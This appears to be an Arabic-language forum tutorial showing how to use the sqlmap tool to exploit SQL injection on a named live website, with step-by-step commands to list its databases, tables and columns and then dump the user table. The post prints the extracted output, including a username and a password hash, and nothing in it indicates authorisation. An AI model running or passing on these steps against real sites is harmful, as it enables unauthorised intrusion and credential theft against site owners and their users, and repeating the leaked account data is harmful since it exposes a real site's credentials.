بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته
الكل يعرف انه ثغرات sql من اقوى واكثر الثغرات انتشارا واحيانا تاخذ وقت في عملية الأستهداف ولاكن الان تستطيع استهداف المواقع المصابة بكل سرعة ممكنة باستخدام اداة في الباك تراك
اسم الأداة :sqlmap
مسار الاداة : /pentest/database/sqlmap
لغة البرمجة : python
الأن كيفية استخدام الاداة في عملية الحقن
اولا : استخراج اسماء قواعد البيانات
لنقل ان هذا الموقع مصاب بثغرة sql
وكلنا نعرف كيفية الفحص وهي باضافة ' الى نهاية الرابط واذا وجد خطأ كان الموقع مصابكود:http://www.bcspeakers.com/page.php?id=22
الأن الأمر المستخدم في استخراج القواعد لهذا الموقع
كود:python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 --dbsالنتيجةمثل ما شفتو تم استخراج القواعد والان القاعدة المستهدفة هي " www-bcspeakerstest"كود:available databases [2]: [*] information_schema [*] www-bcspeakerstest
ثانيا : استخراج الجداول
القاعدة المستهدفة هي " www-bcspeakerstest"
سوف يكون الأمر بهذا الشكل
والنتيجة كبيرة لن اضعها لانها تتكون من 59 جدول على كل حال انا وجدت الجدول المستهدف وهو "_user"كود:python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest --tables
ثالثا : استخراج الأعمدة
الان نأتي الى استخراج الأعمدة الموجودة في جدول "_user"
الكود كالتالي
والنتيجة كالتاليكود:python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user --columns
كما ترون الأعمدة المستهدفة هيكود:+----------+---------------------------+ | Column | Type | +----------+---------------------------+ | id_user | int(10) unsigned zerofill | | password | text | | username | text | +----------+---------------------------+
password
username
رابعا : اسخراج البيانات من الاعمدة
العمود الاول هو عامود اسم المستخدم "username" سوف يكون الكود كالتالي
النتيجةكود:python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C username --dump
كما ترون استخرجنا اسم المستخدمكود:+--------------+ | username | +--------------+ | becspeak2803 | | becspeak2803 | +--------------+
والان نأتي الى استخراج الباسورود
اكود مثل السابق مع تغيير اسم العامود الى عامود الباسوورد
سوف تسألك الأداة اذا كنت تريد محاولة مقارنة الهاش مع قاعدة البيانات المرفقة باالأداةكود:python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C password --dump
تختار مثل ما نت عاوزكود:recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q]
انا اخترت لا لتسريع العملية والنتيجة كالتالي
كما ترون تم استخراج البيانات بسرعة كبيرةكود:+----------------------------------+ | password | +----------------------------------+ | 286adae502ad9d5ab8c4f8644050b448 | | 286adae502ad9d5ab8c4f8644050b448 | +----------------------------------+
اتمنى ان يعجبكم الشرح
وأي استفسار انا جاهز
والسلام عليكم ورحمة الله وبركاته
المفضلات